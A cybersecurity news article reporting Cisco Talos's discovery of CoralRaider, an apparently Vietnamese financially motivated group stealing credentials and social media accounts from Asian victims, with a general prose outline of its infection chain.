Vietnamese Hackers Strike: CoralRaider Targets Asian Accounts

Paige Henley
Paige Henley Editor
Published on: April 6, 2024
Paige Henley Paige Henley
Published on: April 6, 2024 Editor

Cisco Talos, a cybersecurity technology and information security company based in Maryland, recently uncovered a new cyber threat dubbed “CoralRaider”, believed to originate from Vietnam and be driven by financial gain.

Since around 2023, CoralRaider has been targeting individuals across various Asian and Southeast Asian countries including India, Bangladesh, China, Vietnam, South Korea, Indonesia, and others.

To carry out their schemes, CoralRaider employs sophisticated tools like RotBot, a modified version of QuasarRAT, and XClient stealer. Additionally, they utilize a technique called “dead drop,” using legitimate services to conceal their malicious files, along with uncommon programs such as Forfiles.exe and FoDHelper.exe to evade detection.

The attack follows a simple process:

  1. The user opens a malicious Windows Shortcut file
  2. The file downloads and executes an HTML application file (HTA) from an attacker-controlled download server
  3. The HTA activates an embedded Visual Basic script that executes a PowerShell script in the memory
  4. The PowerShell script initiatives 3 others that bypass User Access Controls, perform anti-VM and anti-analysis checks and disable Windows notifications
  5. Finally, it downloads and runs RotBot, which loads the XClient stealer.

The group uses XClient to steal many types of personal data including social media accounts (including those used for business and advertising), credentials, and financial data. This data is then used for financial gain, including sale to other bad actors.

“We found a few Telegram groups in Vietnamese named ‘Kiém tien tử Facebook,’ ‘Mua Bán Scan MINI,’ and ‘Mua Bán Scan Meta.’ ” Cisco Talos said. “Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded.”

The discovery of CoralRaider highlights the ever-evolving nature of cyber threats, particularly concerning financial cybercrime. With a focus on stealing sensitive information, this group poses a significant risk to individuals and organizations alike.

About the Author
Paige Henley
Published on: April 6, 2024

About the Author

Paige Henley is an editor at SafetyDetectives. She has three years of experience writing and editing various cybersecurity articles and blog posts about VPNs, antivirus software, and other data protection tools. As a freelancer, Paige enjoys working in a variety of content niches and is always expanding her knowledge base. When she isn't working as a "Safety Detective", she raises orphaned neonatal kittens, works on DIY projects around the house, and enjoys movie marathons on weekends with her husband and three cats.

Leave a Comment